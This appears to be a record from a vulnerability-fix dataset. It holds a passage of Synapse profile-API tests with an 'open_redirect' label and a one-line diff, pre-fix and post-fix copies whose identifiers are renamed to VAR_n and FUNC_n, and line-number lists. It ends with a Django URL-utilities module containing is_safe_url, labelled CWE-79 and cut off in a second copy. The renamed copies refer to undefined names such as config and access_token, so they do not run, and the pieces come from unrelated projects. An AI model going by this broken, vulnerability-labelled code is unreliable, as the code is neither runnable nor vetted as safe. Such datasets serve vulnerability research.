def request_profile(self, expected_code, url_suffix="", access_token=None):
request, channel = self.make_request(
"GET", self.profile_url + url_suffix, access_token=access_token
)
self.assertEqual(channel.code, expected_code, channel.result)
def ensure_requester_left_room(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
# We don't care whether the leave request didn't return a 200 (e.g.
# if the user isn't already in the room), because we only want to
# make sure the user isn't in the room.
pass
class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):
servlets = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def make_homeserver(self, reactor, clock):
config = self.default_config()
config["require_auth_for_profile_requests"] = True
config["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(config=config)
return self.hs
def prepare(self, reactor, clock, hs):
# User requesting the profile.
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def test_can_lookup_own_profile(self):
"""Tests that a user can lookup their own profile without having to be in a room
if 'require_auth_for_profile_requests' is set to true in the server's config.
"""
request, channel = self.make_request(
"GET", "/profile/" + self.requester, access_token=self.requester_tok
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
request, channel = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
access_token=self.requester_tok,
)
self.assertEqual(channel.code, 200, channel.result)
| open_redirect | {
"code": [
" http_client=None,"
],
"line_no": [
66
]
} | {
"code": [
" federation_http_client=None,"
],
"line_no": [
66
]
} |
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
VAR_0 = "@1234ABCD:test"
VAR_1 = "/_matrix/client/r0"
class CLASS_0(unittest.TestCase):
@defer.inlineCallbacks
def FUNC_0(self):
self.mock_resource = MockHttpResource(prefix=VAR_1)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
VAR_5 = yield setup_test_homeserver(
self.addCleanup,
"test",
http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def FUNC_20(VAR_9=None, VAR_10=False):
return synapse.types.create_requester(VAR_0)
VAR_5.get_auth().get_user_by_req = FUNC_20
profile.register_servlets(VAR_5, self.mock_resource)
@defer.inlineCallbacks
def FUNC_1(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Frank")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Frank"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_2(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (VAR_0), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def FUNC_3(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = AuthError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= VAR_12 < 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_4(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Bob")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Bob"}, VAR_13)
@defer.inlineCallbacks
def FUNC_5(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = SynapseError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= VAR_12 <= 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_6(self):
VAR_11 = self.mock_handler.get_avatar_url
VAR_11.return_value = defer.succeed("http://my.server/me.png")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_7(self):
VAR_14 = self.mock_handler.set_avatar_url
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (VAR_0),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "http://my.server/pic.gif")
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
self.hs = self.setup_test_homeserver()
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def FUNC_10(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "test")
def FUNC_11(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 400, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "owner")
def FUNC_12(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
return VAR_15.json_body["displayname"]
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def FUNC_13(self):
self.try_fetch_profile(401)
def FUNC_14(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, VAR_7=self.requester_tok)
def FUNC_15(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def FUNC_16(self, VAR_6, VAR_7=None):
self.request_profile(VAR_6, VAR_7=access_token)
self.request_profile(
VAR_6, VAR_8="/displayname", VAR_7=access_token
)
self.request_profile(
VAR_6, VAR_8="/avatar_url", VAR_7=access_token
)
def FUNC_17(self, VAR_6, VAR_8="", VAR_7=None):
VAR_9, VAR_15 = self.make_request(
"GET", self.profile_url + VAR_8, VAR_7=access_token
)
self.assertEqual(VAR_15.code, VAR_6, VAR_15.result)
def FUNC_18(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
pass
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def FUNC_19(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/" + self.requester, VAR_7=self.requester_tok
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
|
import json
from mock import Mock
from twisted.internet import defer
import synapse.types
from synapse.api.errors import AuthError, SynapseError
from synapse.rest import admin
from synapse.rest.client.v1 import login, profile, room
from tests import unittest
from ....utils import MockHttpResource, setup_test_homeserver
VAR_0 = "@1234ABCD:test"
VAR_1 = "/_matrix/client/r0"
class CLASS_0(unittest.TestCase):
@defer.inlineCallbacks
def FUNC_0(self):
self.mock_resource = MockHttpResource(prefix=VAR_1)
self.mock_handler = Mock(
spec=[
"get_displayname",
"set_displayname",
"get_avatar_url",
"set_avatar_url",
"check_profile_query_allowed",
]
)
self.mock_handler.get_displayname.return_value = defer.succeed(Mock())
self.mock_handler.set_displayname.return_value = defer.succeed(Mock())
self.mock_handler.get_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.set_avatar_url.return_value = defer.succeed(Mock())
self.mock_handler.check_profile_query_allowed.return_value = defer.succeed(
Mock()
)
VAR_5 = yield setup_test_homeserver(
self.addCleanup,
"test",
federation_http_client=None,
resource_for_client=self.mock_resource,
federation=Mock(),
federation_client=Mock(),
profile_handler=self.mock_handler,
)
async def FUNC_20(VAR_9=None, VAR_10=False):
return synapse.types.create_requester(VAR_0)
VAR_5.get_auth().get_user_by_req = FUNC_20
profile.register_servlets(VAR_5, self.mock_resource)
@defer.inlineCallbacks
def FUNC_1(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Frank")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Frank"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_2(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT", "/profile/%s/displayname" % (VAR_0), b'{"displayname": "Frank Jr."}'
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "Frank Jr.")
@defer.inlineCallbacks
def FUNC_3(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = AuthError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@4567:test"),
b'{"displayname": "Frank Jr."}',
)
self.assertTrue(400 <= VAR_12 < 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_4(self):
VAR_11 = self.mock_handler.get_displayname
VAR_11.return_value = defer.succeed("Bob")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/displayname" % ("@opaque:elsewhere"), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"displayname": "Bob"}, VAR_13)
@defer.inlineCallbacks
def FUNC_5(self):
VAR_14 = self.mock_handler.set_displayname
VAR_14.side_effect = SynapseError(400, "message")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/displayname" % ("@opaque:elsewhere"),
b'{"displayname":"bob"}',
)
self.assertTrue(400 <= VAR_12 <= 499, msg="code %d is in the 4xx range" % (VAR_12))
@defer.inlineCallbacks
def FUNC_6(self):
VAR_11 = self.mock_handler.get_avatar_url
VAR_11.return_value = defer.succeed("http://my.server/me.png")
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"GET", "/profile/%s/avatar_url" % (VAR_0), None
)
self.assertEquals(200, VAR_12)
self.assertEquals({"avatar_url": "http://my.server/me.png"}, VAR_13)
self.assertEquals(VAR_11.call_args[0][0].localpart, "1234ABCD")
@defer.inlineCallbacks
def FUNC_7(self):
VAR_14 = self.mock_handler.set_avatar_url
VAR_14.return_value = defer.succeed(())
(VAR_12, VAR_13) = yield self.mock_resource.trigger(
"PUT",
"/profile/%s/avatar_url" % (VAR_0),
b'{"avatar_url": "http://my.server/pic.gif"}',
)
self.assertEquals(200, VAR_12)
self.assertEquals(VAR_14.call_args[0][0].localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][1].user.localpart, "1234ABCD")
self.assertEquals(VAR_14.call_args[0][2], "http://my.server/pic.gif")
class CLASS_1(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
self.hs = self.setup_test_homeserver()
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
def FUNC_10(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test"}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "test")
def FUNC_11(self):
VAR_9, VAR_15 = self.make_request(
"PUT",
"/profile/%s/displayname" % (self.owner,),
content=json.dumps({"displayname": "test" * 100}),
VAR_7=self.owner_tok,
)
self.assertEqual(VAR_15.code, 400, VAR_15.result)
VAR_16 = self.get_displayname()
self.assertEqual(VAR_16, "owner")
def FUNC_12(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/%s/displayname" % (self.owner,)
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
return VAR_15.json_body["displayname"]
class CLASS_2(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
room.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.owner = self.register_user("owner", "pass")
self.owner_tok = self.login("owner", "pass")
self.profile_url = "/profile/%s" % (self.owner)
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
self.room_id = self.helper.create_room_as(self.owner, tok=self.owner_tok)
def FUNC_13(self):
self.try_fetch_profile(401)
def FUNC_14(self):
self.ensure_requester_left_room()
self.try_fetch_profile(403, VAR_7=self.requester_tok)
def FUNC_15(self):
self.ensure_requester_left_room()
self.helper.join(room=self.room_id, user=self.requester, tok=self.requester_tok)
self.try_fetch_profile(200, self.requester_tok)
def FUNC_16(self, VAR_6, VAR_7=None):
self.request_profile(VAR_6, VAR_7=access_token)
self.request_profile(
VAR_6, VAR_8="/displayname", VAR_7=access_token
)
self.request_profile(
VAR_6, VAR_8="/avatar_url", VAR_7=access_token
)
def FUNC_17(self, VAR_6, VAR_8="", VAR_7=None):
VAR_9, VAR_15 = self.make_request(
"GET", self.profile_url + VAR_8, VAR_7=access_token
)
self.assertEqual(VAR_15.code, VAR_6, VAR_15.result)
def FUNC_18(self):
try:
self.helper.leave(
room=self.room_id, user=self.requester, tok=self.requester_tok
)
except AssertionError:
pass
class CLASS_3(unittest.HomeserverTestCase):
VAR_2 = [
admin.register_servlets_for_client_rest_resource,
login.register_servlets,
profile.register_servlets,
]
def FUNC_8(self, VAR_3, VAR_4):
VAR_17 = self.default_config()
VAR_17["require_auth_for_profile_requests"] = True
VAR_17["limit_profile_requests_to_users_who_share_rooms"] = True
self.hs = self.setup_test_homeserver(VAR_17=config)
return self.hs
def FUNC_9(self, VAR_3, VAR_4, VAR_5):
self.requester = self.register_user("requester", "pass")
self.requester_tok = self.login("requester", "pass")
def FUNC_19(self):
VAR_9, VAR_15 = self.make_request(
"GET", "/profile/" + self.requester, VAR_7=self.requester_tok
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/displayname",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
VAR_9, VAR_15 = self.make_request(
"GET",
"/profile/" + self.requester + "/avatar_url",
VAR_7=self.requester_tok,
)
self.assertEqual(VAR_15.code, 200, VAR_15.result)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
22,
27,
29,
31,
34,
35,
38,
41,
54,
62,
72,
75,
77,
79,
84,
88,
92,
97,
101,
106,
111,
117,
119,
124,
128,
131,
136,
142,
144,
149,
153,
157,
162,
168,
173,
174,
176,
182,
186,
190,
199,
202,
212,
215,
222,
223,
225,
232,
234,
239,
241,
243,
247,
248,
251,
253,
256,
259,
261,
264,
266,
268,
271,
275,
279,
285,
292,
293,
294,
296,
297,
299,
305,
311,
313,
315,
318,
327,
334,
341,
16,
37,
38,
39,
40,
204,
320,
321,
322
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
18,
20,
22,
27,
29,
31,
34,
35,
38,
41,
54,
62,
72,
75,
77,
79,
84,
88,
92,
97,
101,
106,
111,
117,
119,
124,
128,
131,
136,
142,
144,
149,
153,
157,
162,
168,
173,
174,
176,
182,
186,
190,
199,
202,
212,
215,
222,
223,
225,
232,
234,
239,
241,
243,
247,
248,
251,
253,
256,
259,
261,
264,
266,
268,
271,
275,
279,
285,
292,
293,
294,
296,
297,
299,
305,
311,
313,
315,
318,
327,
334,
341,
16,
37,
38,
39,
40,
204,
320,
321,
322
] |
1CWE-79
| from __future__ import unicode_literals
import base64
import calendar
import datetime
import re
import sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, urlencode as original_urlencode,
urlparse,
)
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = re.compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = re.compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = re.compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = str(":/?#[]@")
RFC3986_SUBDELIMS = str("!$&'()*+,;=")
PROTOCOL_TO_PORT = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def urlquote(url, safe='/'):
"""
A version of Python's urllib.quote() function that can operate on unicode
strings. The url is first UTF-8 encoded before quoting. The returned string
can safely be used as part of an argument to a subsequent iri_to_uri() call
without double-quoting occurring.
"""
return force_text(quote(force_str(url), force_str(safe)))
@keep_lazy_text
def urlquote_plus(url, safe=''):
"""
A version of Python's urllib.quote_plus() function that can operate on
unicode strings. The url is first UTF-8 encoded before quoting. The
returned string can safely be used as part of an argument to a subsequent
iri_to_uri() call without double-quoting occurring.
"""
return force_text(quote_plus(force_str(url), force_str(safe)))
@keep_lazy_text
def urlunquote(quoted_url):
"""
A wrapper for Python's urllib.unquote() function that can operate on
the result of django.utils.http.urlquote().
"""
return force_text(unquote(force_str(quoted_url)))
@keep_lazy_text
def urlunquote_plus(quoted_url):
"""
A wrapper for Python's urllib.unquote_plus() function that can operate on
the result of django.utils.http.urlquote_plus().
"""
return force_text(unquote_plus(force_str(quoted_url)))
def urlencode(query, doseq=0):
"""
A version of Python's urllib.urlencode() function that can operate on
unicode strings. The parameters are first cast to UTF-8 encoded strings and
then encoded as per normal.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
return original_urlencode(
[(force_str(k),
[force_str(i) for i in v] if isinstance(v, (list, tuple)) else force_str(v))
for k, v in query],
doseq)
def cookie_date(epoch_seconds=None):
"""
Formats the time to ensure compatibility with Netscape's cookie standard.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD-Mon-YYYY HH:MM:SS GMT'.
"""
rfcdate = formatdate(epoch_seconds)
return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])
def http_date(epoch_seconds=None):
"""
Formats the time to match the RFC1123 date format as specified by HTTP
RFC2616 section 3.3.1.
Accepts a floating point number expressed in seconds since the epoch, in
UTC - such as that outputted by time.time(). If set to None, defaults to
the current time.
Outputs a string in the format 'Wdy, DD Mon YYYY HH:MM:SS GMT'.
"""
return formatdate(epoch_seconds, usegmt=True)
def parse_http_date(date):
"""
Parses a date format as specified by HTTP RFC2616 section 3.3.1.
The three formats allowed by the RFC are accepted, even if only the first
one is still in widespread use.
Returns an integer expressed in seconds since the epoch, in UTC.
"""
# emails.Util.parsedate does the job for RFC1123 dates; unfortunately
# RFC2616 makes it mandatory to support RFC850 dates too. So we roll
# our own RFC-compliant parsing.
for regex in RFC1123_DATE, RFC850_DATE, ASCTIME_DATE:
m = regex.match(date)
if m is not None:
break
else:
raise ValueError("%r is not in a valid HTTP date format" % date)
try:
year = int(m.group('year'))
if year < 100:
if year < 70:
year += 2000
else:
year += 1900
month = MONTHS.index(m.group('mon').lower()) + 1
day = int(m.group('day'))
hour = int(m.group('hour'))
min = int(m.group('min'))
sec = int(m.group('sec'))
result = datetime.datetime(year, month, day, hour, min, sec)
return calendar.timegm(result.utctimetuple())
except Exception:
six.reraise(ValueError, ValueError("%r is not a valid date" % date), sys.exc_info()[2])
def parse_http_date_safe(date):
"""
Same as parse_http_date, but returns None if the input is invalid.
"""
try:
return parse_http_date(date)
except Exception:
pass
# Base 36 functions: useful for generating compact URLs
def base36_to_int(s):
"""
Converts a base 36 string to an ``int``. Raises ``ValueError` if the
input won't fit into an int.
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is long than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError("Base36 input too large")
value = int(s, 36)
# ... then do a final check that the value will fit into an int to avoid
# returning a long (#15067). The long type was removed in Python 3.
if six.PY2 and value > sys.maxint:
raise ValueError("Base36 input too large")
return value
def int_to_base36(i):
"""
Converts an integer to a base36 string
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError("Negative base36 conversion input.")
if six.PY2:
if not isinstance(i, six.integer_types):
raise TypeError("Non-integer base36 conversion input.")
if i > sys.maxint:
raise ValueError("Base36 conversion input too large.")
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
def urlsafe_base64_encode(s):
"""
Encodes a bytestring in base64 for use in URLs, stripping any trailing
equal signs.
"""
return base64.urlsafe_b64encode(s).rstrip(b'\n=')
def urlsafe_base64_decode(s):
"""
Decodes a base64 encoded string, adding back any trailing equal signs that
might have been stripped.
"""
s = force_bytes(s)
try:
return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
except (LookupError, BinasciiError) as e:
raise ValueError(e)
def parse_etags(etag_str):
"""
Parses a string with one or several etags passed in If-None-Match and
If-Match headers by the rules in RFC 2616. Returns a list of etags
without surrounding double quotes (") and unescaped from \<CHAR>.
"""
etags = ETAG_MATCH.findall(etag_str)
if not etags:
# etag_str has wrong format, treat it as an opaque string then
return [etag_str]
etags = [e.encode('ascii').decode('unicode_escape') for e in etags]
return etags
def quote_etag(etag):
"""
Wraps a string in double quotes escaping contents as necessary.
"""
return '"%s"' % etag.replace('\\', '\\\\').replace('"', '\\"')
def unquote_etag(etag):
"""
Unquote an ETag string; i.e. revert quote_etag().
"""
return etag.strip('"').replace('\\"', '"').replace('\\\\', '\\') if etag else etag
def is_same_domain(host, pattern):
"""
Return ``True`` if the host is either an exact match or a match
to the wildcard pattern.
Any pattern beginning with a period matches a domain and all of its
subdomains. (e.g. ``.example.com`` matches ``example.com`` and
``foo.example.com``). Anything else is an exact string match.
"""
if not pattern:
return False
pattern = pattern.lower()
return (
pattern[0] == '.' and (host.endswith(pattern) or host == pattern[1:]) or
pattern == host
)
def is_safe_url(url, host=None):
"""
Return ``True`` if the url is a safe redirection (i.e. it doesn't point to
a different host and uses a safe scheme).
Always returns ``False`` on an empty url.
"""
if url is not None:
url = url.strip()
if not url:
return False
# Chrome treats \ completely as /
url = url.replace('\\', '/')
# Chrome considers any URL with more than two slashes to be absolute, but
# urlparse is not so flexible. Treat any url with three slashes as unsafe.
if url.startswith('///'):
return False
url_info = urlparse(url)
# Forbid URLs like http:///example.com - with a scheme, but without a hostname.
# In that URL, example.com is not the hostname but, a path component. However,
# Chrome will still consider example.com to be the hostname, so we must not
# allow this syntax.
if not url_info.netloc and url_info.scheme:
return False
# Forbid URLs that start with control characters. Some browsers (like
# Chrome) ignore quite a few control characters at the start of a
# URL and might consider the URL as scheme relative.
if unicodedata.category(url[0])[0] == 'C':
return False
return ((not url_info.netloc or url_info.netloc == host) and
(not url_info.scheme or url_info.scheme in ['http', 'https']))
| from __future__ import unicode_literals
import base64
import calendar
import datetime
import re
import sys
import unicodedata
from binascii import Error as BinasciiError
from email.utils import formatdate
from django.utils import six
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.functional import keep_lazy_text
from django.utils.six.moves.urllib.parse import (
quote, quote_plus, unquote, unquote_plus, urlencode as original_urlencode,
urlparse,
)
ETAG_MATCH = re.compile(r'(?:W/)?"((?:\\.|[^"])*)"')
MONTHS = 'jan feb mar apr may jun jul aug sep oct nov dec'.split()
__D = r'(?P<day>\d{2})'
__D2 = r'(?P<day>[ \d]\d)'
__M = r'(?P<mon>\w{3})'
__Y = r'(?P<year>\d{4})'
__Y2 = r'(?P<year>\d{2})'
__T = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'
RFC1123_DATE = re.compile(r'^\w{3}, %s %s %s %s GMT$' % (__D, __M, __Y, __T))
RFC850_DATE = re.compile(r'^\w{6,9}, %s-%s-%s %s GMT$' % (__D, __M, __Y2, __T))
ASCTIME_DATE = re.compile(r'^\w{3} %s %s %s %s$' % (__M, __D2, __T, __Y))
RFC3986_GENDELIMS = str(":/?#[]@")
RFC3986_SUBDELIMS = str("!$&'()*+,;=")
PROTOCOL_TO_PORT = {
'http': 80,
'https': 443,
}
@keep_lazy_text
def urlquote(url, safe='/'):
"""
A version of Python's urllib.quote() function that can operate on unicode
strings. The url is first UTF-8 encoded before quoting. The returned string
can safely be used as part of an argument to a subsequent iri_to_uri() call
without double-quoting occurring.
"""
return force_text(quote(force_str(url), force_str(safe)))
@keep_lazy_text
def urlquote_plus(url, safe=''):
"""
A version of Python's urllib.quote_plus() function that can operate on
unicode strings. The url is first UTF-8 encoded before quoting. The
returned string can safely be used as part of an argument to a subsequent
iri_to_uri() call without double-quoting occurring.
"""
return force_text(quote_plus(force_str(url), force_str(safe)))
@keep_lazy_text
def urlunquote(quoted_url):
"""
A wrapper for Python's urllib.unquote() function that can operate on
the result of django.utils.http.urlquote().
"""
return force_text(unquote(force_str(quoted_url)))
@keep_lazy_text
def urlunquote_plus(quoted_url):
"""
A wrapper for Python's urllib.unquote_plus() function that can operate on
the result of django.utils.http.urlquote_plus().
"""
return force_text(unquote_plus(force_str(quoted_url)))
def urlencode(query, doseq=0):
"""
A version of Python's urllib.urlencode() function that can operate on
unicode strings. The parameters are first cast to UTF-8 encoded strings and
then encoded as per normal.
"""
if isinstance(query, MultiValueDict):
query = query.lists()
elif hasattr(query, 'items'):
query = query.items()
